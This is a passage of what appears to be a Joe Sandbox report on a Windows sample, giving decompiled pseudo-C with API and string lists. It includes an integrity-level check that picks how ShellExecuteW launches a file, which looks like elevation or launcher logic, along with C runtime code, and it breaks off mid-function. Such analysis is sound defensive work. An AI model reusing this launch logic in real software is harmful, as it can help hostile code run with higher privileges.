0x002416f3
0x002416f6
0x002416fc
0x002416fe
0x002416ff
0x00000000
0x002416ff
0x002416d9
0x00000000
0x002416d9
0x00241635
0x00241604
0x00000000
0x00241604
0x00000000

APIs

Part of subcall function 002410CD: GetProcessHeap.KERNEL32(00000008,00000200), ref: 00241129
Part of subcall function 002410CD: HeapAlloc.KERNEL32(00000000), ref: 00241136
Part of subcall function 002410CD: GetProcessHeap.KERNEL32(00000008,00000200), ref: 00241144
Part of subcall function 002410CD: HeapAlloc.KERNEL32(00000000), ref: 0024114B
Part of subcall function 002410CD: GetEnvironmentVariableW.KERNEL32(00000000,00000000,00000200), ref: 00241224
Part of subcall function 002410CD: lstrcatW.KERNEL32(00000000,00259728), ref: 00241296
Part of subcall function 002410CD: lstrcatW.KERNEL32(00000000,3C4268AB), ref: 0024129F
Part of subcall function 002410CD: GetProcessHeap.KERNEL32(00000008,0025B810), ref: 002412A9
Part of subcall function 002410CD: HeapFree.KERNEL32(00000000), ref: 002412B0

LoadLibraryW.KERNEL32(?), ref: 002415FA
GetProcAddress.KERNEL32(00000000,00000043), ref: 00241611
CreateFileW.KERNEL32(?,00000004,00000002,00000000,00000002,00000054,00000000), ref: 0024162E
LoadLibraryW.KERNEL32(?), ref: 002416B2
GetProcAddress.KERNEL32(00000000,00000057), ref: 002416C1
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 002416D2
CloseHandle.KERNEL32(00000000), ref: 002416D9
CloseHandle.KERNEL32(00000000), ref: 002416F6

Strings

Fi, xrefs: 002415E8
at, xrefs: 002415DF
it, xrefs: 0024169A
W, xrefs: 00241696
C, xrefs: 002415D8
W, xrefs: 002415F4
Fi, xrefs: 002416A3

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00241D09, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 81

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E00241D09(void* __ecx) {
				long _v8;
				void* _v12;
				int _t10;
				int _t12;
				int _t13;
				int _t17;
				DWORD* _t23;
				void* _t29;
				int _t31;

				_t10 = OpenProcessToken(GetCurrentProcess(), 8,  &_v12);
				if(_t10 != 0) {
					_t31 = 0;
					_t12 = GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
					if(_t12 != 0 || GetLastError() != 0x7a) {
						L17:
						_t13 = CloseHandle(_v12);
						goto L18;
					} else {
						_t29 = LocalAlloc(0, _v8);
						if(_t29 == 0) {
							goto L17;
						}
						_t17 = GetTokenInformation(_v12, 0x19, _t29, _v8,  &_v8); // executed
						if(_t17 == 0) {
							L16:
							LocalFree(_t29);
							goto L17;
						}
						_t23 = GetSidSubAuthority( *_t29,  *(GetSidSubAuthorityCount( *_t29)) - 0x00000001 & 0x000000ff);
						if( *_t23 == 0x1000) {
							L15:
							LocalFree(_t29);
							_t13 = _t31;
							L18:
							return _t13;
						}
						if( *_t23 < 0x2000) {
							if( *_t23 < 0x3000) {
								if( *_t23 < 0x4000) {
									goto L16;
								}
								L13:
								_push(3);
								L14:
								_pop(_t31);
								goto L15;
							}
							L10:
							if( *_t23 >= 0x4000) {
								goto L13;
							}
							_push(2);
							goto L14;
						}
						if( *_t23 >= 0x3000) {
							goto L10;
						}
						_t31 = 1;
						goto L15;
					}
				}
				return _t10;
			}

0x00241d1b
0x00241d23
0x00241d2e
0x00241d38
0x00241d40
0x00241de0
0x00241de3
0x00000000
0x00241d55
0x00241d5f
0x00241d63
0x00000000
0x00000000
0x00241d72
0x00241d7a
0x00241dd9
0x00241dda
0x00000000
0x00241dda
0x00241d8e
0x00241d9a
0x00241dce
0x00241dcf
0x00241dd5
0x00241de9
0x00000000
0x00241dea
0x00241da2
0x00241db5
0x00241dc9
0x00000000
0x00000000
0x00241dcb
0x00241dcb
0x00241dcd
0x00241dcd
0x00000000
0x00241dcd
0x00241db7
0x00241dbd
0x00000000
0x00000000
0x00241dbf
0x00000000
0x00241dbf
0x00241daa
0x00000000
0x00000000
0x00241dac
0x00000000
0x00241dac
0x00241d40
0x00241dee

APIs

GetCurrentProcess.KERNEL32(?,?,?,00241873), ref: 00241D0E
OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00241873), ref: 00241D1B
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,?,00241873), ref: 00241D38
GetLastError.KERNEL32(?,?,?,00241873), ref: 00241D46
LocalAlloc.KERNEL32(00000000,?,?,?,?,00241873), ref: 00241D59
GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?,?,?,?,00241873), ref: 00241D72
GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00241873), ref: 00241D7E
GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00241873), ref: 00241D8E
LocalFree.KERNEL32(00000000,?,?,?,00241873), ref: 00241DCF
LocalFree.KERNEL32(00000000,?,?,?,00241873), ref: 00241DDA
CloseHandle.KERNEL32(?), ref: 00241DE3

Strings

TBtuWtu, xrefs: 00241D1B

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 00241707, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 148
string

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E00241707(void* __ecx, void* __edx, signed int _a4) {
				short _v8;
				short _v10;
				short _v12;
				short _v14;
				char _v16;
				short* _v20;
				WCHAR* _v24;
				short* _v28;
				void* __edi;
				void* __esi;
				short _t38;
				short _t39;
				short _t40;
				signed int _t43;
				signed int _t46;
				signed int _t47;
				signed int _t48;
				short* _t51;
				short* _t53;
				WCHAR* _t54;
				void* _t60;
				signed int _t70;
				signed int _t72;
				intOrPtr _t73;
				void* _t77;
				void* _t84;
				void* _t91;
				void* _t92;
				intOrPtr _t94;
				WCHAR* _t95;
				void* _t96;
				intOrPtr* _t98;

				_t91 = __edx;
				_t72 = _a4;
				_push(_t96);
				_push(_t92);
				if(_t72 <  *((intOrPtr*)(__ecx + 8))) {
					_t73 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 4)) + _t72 * 4));
					_t38 = 0x2e;
					_v16 = _t38;
					_t39 = 0x64;
					_v14 = _t39;
					_t40 = 0x6c;
					_v12 = _t40;
					_v10 = _t40;
					_v8 = 0;
					_push( &_v16);
					_push( *(_t73 + 0x10));
					_t43 = E00243675(__ecx);
					_pop(_t77);
					__eflags = _t43;
					if(__eflags == 0) {
						__eflags = E00241D09(_t77) - 3;
						if(__eflags != 0) {
							_t46 = ShellExecuteW(0, L"open",  *(_t73 + 0x10), 0, 0,  *(_t73 + 0x20));
							__eflags = _t46 - 0x20;
							_t36 = _t46 - 0x20 >= 0;
							__eflags = _t36;
							_t47 = _t46 & 0xffffff00 | _t36;
						} else {
							_t48 = E00241B02( *(_t73 + 0x10), __eflags);
							asm("sbb al, al");
							_t47 =  ~_t48 + 1;
						}
						L13:
						return _t47;
					}
					_t98 = E002429BD(_t91, _t96, __eflags, 0x10);
					 *((intOrPtr*)(_t98 + 8)) = 0x25b810;
					 *((intOrPtr*)(_t98 + 0xc)) = 0xb;
					 *_t98 = 0x25b854;
					 *((intOrPtr*)(_t98 + 4)) = 0x1c;
					_t51 = E00241DEF(_t98, _t91, _t92);
					_t94 = 0xa;
					_v28 = _t51;
					 *_t98 = 0x25b834;
					 *((intOrPtr*)(_t98 + 4)) = _t94;
					_v24 = E00241DEF(_t98, _t91, _t94);
					 *_t98 = 0x25b870;
					 *((intOrPtr*)(_t98 + 4)) = _t94;
					_t53 = E00241DEF(_t98, _t91, _t94);
					_push(2);
					_v20 = _t53;
					_t54 = E002443B7(_t98);
					_t84 = 0x200;
					_t95 = _t54; // executed
					__eflags = E00241D09(_t84) - 3;
					if(__eflags != 0) {
						lstrcatW(_t95, "\"");
						lstrcatW(_t95,  *(_t73 + 0x10));
						lstrcatW(_t95, _v24);
						_t100 = _v20;
						_t60 = ShellExecuteW(0, _v20, _v28, _t95, 0,  *(_t73 + 0x20)); // executed
						__eflags = _t60 - 0x20;
						if(_t60 >= 0x20) {
							L9:
							E002443C2(_t95);
							E002429B8(_v28);
							E002429B8(_v24);
							E002429B8(_t100);
							_t47 = 1;
							goto L13;
						}
						L5:
						E002443C2(_t95);
						goto L1;
					}
					lstrcatW(_t95, _v28);
					lstrcatW(_t95, L" \"");
					lstrcatW(_t95,  *(_t73 + 0x10));
					lstrcatW(_t95, _v24);
					_t70 = E00241B02(_t95, __eflags);
					__eflags = _t70;
					if(_t70 == 0) {
						_t100 = _v20;
						goto L9;
					}
					goto L5;
				}
				L1:
				_t47 = 0;
				goto L13;
			}

0x00241707
0x00241711
0x00241714
0x00241715
0x00241719
0x00241727
0x0024172a
0x0024172b
0x00241732
0x00241733
0x0024173a
0x0024173b
0x00241740
0x00241747
0x00241750
0x00241751
0x00241754
0x0024175a
0x0024175b
0x0024175d
0x00241873
0x00241876
0x00241898
0x0024189e
0x002418a1
0x002418a1
0x002418a1
0x00241878
0x0024187b
0x00241882
0x00241884
0x00241884
0x002418a4
0x002418aa
0x002418aa
0x0024176a
0x0024176f
0x00241776
0x0024177d
0x00241783
0x0024178a
0x00241791
0x00241794
0x00241798
0x0024179e
0x002417a8
0x002417ac
0x002417b2
0x002417b5
0x002417ba
0x002417c1
0x002417c5
0x002417cb
0x002417cc
0x002417d9
0x002417dc
0x00241817
0x0024181d
0x00241824
0x00241829
0x00241837
0x0024183d
0x00241840
0x00241848
0x00241849
0x00241853
0x0024185d
0x00241864
0x0024186a
0x00000000
0x0024186a
0x00241805
0x00241806
0x00000000
0x0024180b
0x002417e3
0x002417eb
0x002417f1
0x002417f8
0x002417fc
0x00241801
0x00241803
0x00241844
0x00000000
0x00241844
0x00000000
0x00241803
0x0024171b
0x0024171b
0x00000000

APIs

_wcsstr.LIBVCRUNTIME ref: 00241754
lstrcatW.KERNEL32(00000000,?), ref: 002417E3
lstrcatW.KERNEL32(00000000,0025972C), ref: 002417EB
lstrcatW.KERNEL32(00000000,?), ref: 002417F1
lstrcatW.KERNEL32(00000000,?), ref: 002417F8
lstrcatW.KERNEL32(00000000,00259734), ref: 00241817
lstrcatW.KERNEL32(00000000,?), ref: 0024181D
lstrcatW.KERNEL32(00000000,?), ref: 00241824
ShellExecuteW.SHELL32(00000000,?,?,00000000,00000000,?), ref: 00241837

Part of subcall function 00241D09: GetCurrentProcess.KERNEL32(?,?,?,00241873), ref: 00241D0E
Part of subcall function 00241D09: OpenProcessToken.ADVAPI32(00000000,00000008,?,?,00241873), ref: 00241D1B
Part of subcall function 00241D09: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?,?,?,?,00241873), ref: 00241D38
Part of subcall function 00241D09: GetLastError.KERNEL32(?,?,?,00241873), ref: 00241D46
Part of subcall function 00241D09: LocalAlloc.KERNEL32(00000000,?,?,?,?,00241873), ref: 00241D59
Part of subcall function 00241D09: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?,?,?,?,00241873), ref: 00241D72
Part of subcall function 00241D09: GetSidSubAuthorityCount.ADVAPI32(00000000,?,?,?,00241873), ref: 00241D7E
Part of subcall function 00241D09: GetSidSubAuthority.ADVAPI32(00000000,?,?,?,?,00241873), ref: 00241D8E
Part of subcall function 00241D09: LocalFree.KERNEL32(00000000,?,?,?,00241873), ref: 00241DCF
Part of subcall function 00241D09: LocalFree.KERNEL32(00000000,?,?,?,00241873), ref: 00241DDA
Part of subcall function 00241D09: CloseHandle.KERNEL32(?), ref: 00241DE3

ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,?), ref: 00241898

Part of subcall function 00241B02: LoadLibraryW.KERNEL32(?), ref: 00241BF5
Part of subcall function 00241B02: GetProcAddress.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00241C08

Strings

open, xrefs: 00241892

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024C627, Relevance: 9.2, APIs: 6, Instructions: 216

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E0024C627(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				void* _t96;
				int _t98;
				short* _t101;
				int _t103;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x25b018; // 0x6083b07a
				_v8 = _t49 ^ _t106;
				_push(__esi);
				_t103 = _a20;
				if(_t103 > 0) {
					_t78 = E0024F1E9(_a16, _t103);
					_t110 = _t78 - _t103;
					_t4 = _t78 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t78;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					return E00243541(_v8 ^ _t106);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t105 = 0;
							L37:
							E0024B736(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
						_t121 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t60 = E0024AF1D(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t60;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t87 = _t96 + 8;
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E0024B736(_t101);
									goto L36;
								}
								_t62 = E0024AF1D(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E0024B736(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t96 + 8;
							__eflags = _t96 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t96 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t96 - _t87;
								asm("sbb eax, eax");
								_t101 = E00246F07(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t87;
							asm("sbb eax, eax");
							E00252260();
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t71 = E0024AF1D(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
						_t105 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E00246F07(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00252260();
					_t81 = _t107;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x0024c62c
0x0024c62d
0x0024c62e
0x0024c635
0x0024c639
0x0024c63a
0x0024c640
0x0024c646
0x0024c64c
0x0024c64f
0x0024c64f
0x0024c652
0x0024c654
0x0024c654
0x0024c652
0x0024c656
0x0024c65b
0x0024c662
0x0024c665
0x0024c665
0x0024c681
0x0024c687
0x0024c68c
0x0024c81f
0x0024c832
0x0024c692
0x0024c692
0x0024c695
0x0024c69a
0x0024c69e
0x0024c6f2
0x0024c6f2
0x0024c6f4
0x0024c6f6
0x0024c814
0x0024c814
0x0024c816
0x0024c817
0x00000000
0x0024c81d
0x0024c707
0x0024c70d
0x0024c70f
0x00000000
0x00000000
0x0024c715
0x0024c727
0x0024c72c
0x0024c730
0x00000000
0x00000000
0x0024c73d
0x0024c777
0x0024c77a
0x0024c77d
0x0024c77f
0x0024c781
0x0024c783
0x0024c7cf
0x0024c7cf
0x0024c7d1
0x0024c7d1
0x0024c7d3
0x0024c80d
0x0024c80e
0x00000000
0x0024c813
0x0024c7e7
0x0024c7ec
0x0024c7ee
0x00000000
0x00000000
0x0024c7f2
0x0024c7f3
0x0024c7f4
0x0024c7f7
0x0024c833
0x0024c836
0x0024c7f9
0x0024c7f9
0x0024c7fa
0x0024c7fa
0x0024c807
0x0024c809
0x0024c80b
0x0024c83c
0x00000000
0x00000000
0x00000000
0x00000000
0x0024c80b
0x0024c785
0x0024c788
0x0024c78a
0x0024c78c
0x0024c78e
0x0024c791
0x0024c796
0x0024c7b1
0x0024c7b3
0x0024c7bd
0x0024c7bf
0x0024c7c0
0x0024c7c2
0x00000000
0x00000000
0x0024c7c4
0x0024c7ca
0x0024c7ca
0x00000000
0x0024c7ca
0x0024c798
0x0024c79a
0x0024c79e
0x0024c7a3
0x0024c7a5
0x0024c7a7
0x00000000
0x00000000
0x0024c7a9
0x00000000
0x0024c7a9
0x0024c73f
0x0024c744
0x00000000
0x00000000
0x0024c74a
0x0024c74c
0x00000000
0x00000000
0x0024c763
0x0024c768
0x0024c76c
0x00000000
0x00000000
0x00000000
0x0024c772
0x0024c6a5
0x0024c6a7
0x0024c6a9
0x0024c6b1
0x0024c6d0
0x0024c6d2
0x0024c6dc
0x0024c6de
0x0024c6df
0x0024c6e1
0x00000000
0x00000000
0x0024c6e7
0x0024c6ed
0x0024c6ed
0x00000000
0x0024c6ed
0x0024c6b5
0x0024c6b9
0x0024c6be
0x0024c6c2
0x00000000
0x00000000
0x0024c6c8
0x00000000
0x0024c6c8

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,002451CE,002451CE,?,?,?,0024C878,00000001,00000001,E9E85006), ref: 0024C681
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0024C878,00000001,00000001,E9E85006,?,?,?), ref: 0024C707

Part of subcall function 0024AF1D: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,E9E85006,00000001,?,000000FF), ref: 0024AF8E

Part of subcall function 00246F07: RtlAllocateHeap.NTDLL(00000000,?,?,?,002429E9,?,?,002410DD,00000010), ref: 00246F39

WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,E9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0024C801
__freea.LIBCMT ref: 0024C80E
__freea.LIBCMT ref: 0024C817

Part of subcall function 00243541: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00243585

__freea.LIBCMT ref: 0024C83C

Memory Dump Source

Source File: 00000004.00000002.1585755168.00241000.00000020.sdmp, Offset: 00240000, based on PE: true

Associated: 00000004.00000002.1585741756.00240000.00000002.sdmp
Associated: 00000004.00000002.1585832424.00254000.00000002.sdmp
Associated: 00000004.00000002.1585884932.0025B000.00000004.sdmp
Associated: 00000004.00000002.1585928279.00262000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_240000_M4P9S1S3.jbxd

Function 0024A513, Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 419

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 81%

			E0024A513(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t170;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				void* _t286;
				signed int _t287;
				signed int _t289;
				signed int _t291;
				signed int _t292;
				signed int* _t293;
				signed int _t299;
				signed int _t300;
				CHAR* _t301;
				signed int _t303;
				signed int _t304;
				WCHAR* _t305;
				signed int _t306;
				signed int _t307;
				signed int* _t308;
				signed int _t309;
				signed int _t311;
				void* _t317;
				void* _t318;
				void* _t319;
				void* _t321;
				void* _t322;
				void* _t323;
				void* _t324;

				_t217 = _a4;
				if(_t217 != 0) {
					_t287 = _t217;
					_t116 = E00252FE0(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t286;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(E00247BEF())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t299 =  *0x261950; // 0x57c160
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t299 -  *0x26195c; // 0x57c160
							if(__eflags == 0) {
								L87();
								_t299 = _t120;
								_t120 = _v5;
								_t231 = _t299;
								 *0x261950 = _t299;
							}
							_t218 = 0;
							__eflags = _t299;
							if(_t299 != 0) {
								L21:
								_t233 = _t287;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t300 = E0024BAE7(_t299);
												E00246ECD(_t218);
												_t321 = _t321 + 0x10;
												__eflags = _t300;
												if(_t300 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t287 = _t218;
													_t126 = _a4;
													 *(_t300 + _t237 * 4) = _t126;
													 *(_t300 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t299 - _t218;
									if( *_t299 == _t218) {
										goto L29;
									} else {
										E00246ECD( *((intOrPtr*)(_t299 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t299 + _t282 * 4) - _t218;
												if( *(_t299 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t299 + _t282 * 4) =  *(_t299 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t300 = E0024BAE7(_t299);
											E00246ECD(_t218);
											_t321 = _t321 + 0x10;
											_t126 = _t287;
											__eflags = _t300;
											if(_t300 != 0) {
												L34:
												 *0x261950 = _t300;
											}
										} else {
											_t126 = _a4;
											_t287 = _t218;
											 *(_t299 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t284 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t284 + 2;
											_t301 = E00246F55(_t238 - _t284, _t238 - _t284 + 2, 1);
											_pop(_t241);
											__eflags = _t301;
											if(_t301 == 0) {
												L42:
												E00246ECD(_t301);
												goto L12;
											} else {
												_t131 = E00246E73(_t301, _v12, _a4);
												_t322 = _t321 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0024792D();
													asm("int3");
													_t317 = _t322;
													_t323 = _t322 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t301);
														_push(_t287);
														_push(0x3d);
														_t289 = _t220;
														_t133 = E0025310B(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(E00247BEF())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t303 =  *0x261954; // 0x586768
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t303 -  *0x261958; // 0x585ce8
																if(__eflags == 0) {
																	_push(_t303); // executed
																	L104(); // executed
																	_t246 = _v9;
																	_t303 = _t133;
																	 *0x261954 = _t303;
																}
																__eflags = _t303;
																if(_t303 != 0) {
																	L64:
																	_v20 = _v20 - _t289 >> 1;
																	_t138 = E0024AB4E(_t289, _v20 - _t289 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t304 = E0024BAE7(_t303);
																					E00246ECD(_t221);
																					_t323 = _t323 + 0x10;
																					__eflags = _t304;
																					if(_t304 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t289 = _t221;
																						_t142 = _v0;
																						 *(_t304 + _t253 * 4) = _t142;
																						 *(_t304 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t303 - _t221;
																		if( *_t303 == _t221) {
																			goto L72;
																		} else {
																			E00246ECD( *((intOrPtr*)(_t303 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t303 + _t276 * 4) - _t221;
																					if( *(_t303 + _t276 * 4) == _t221) {
																						break;
																					}
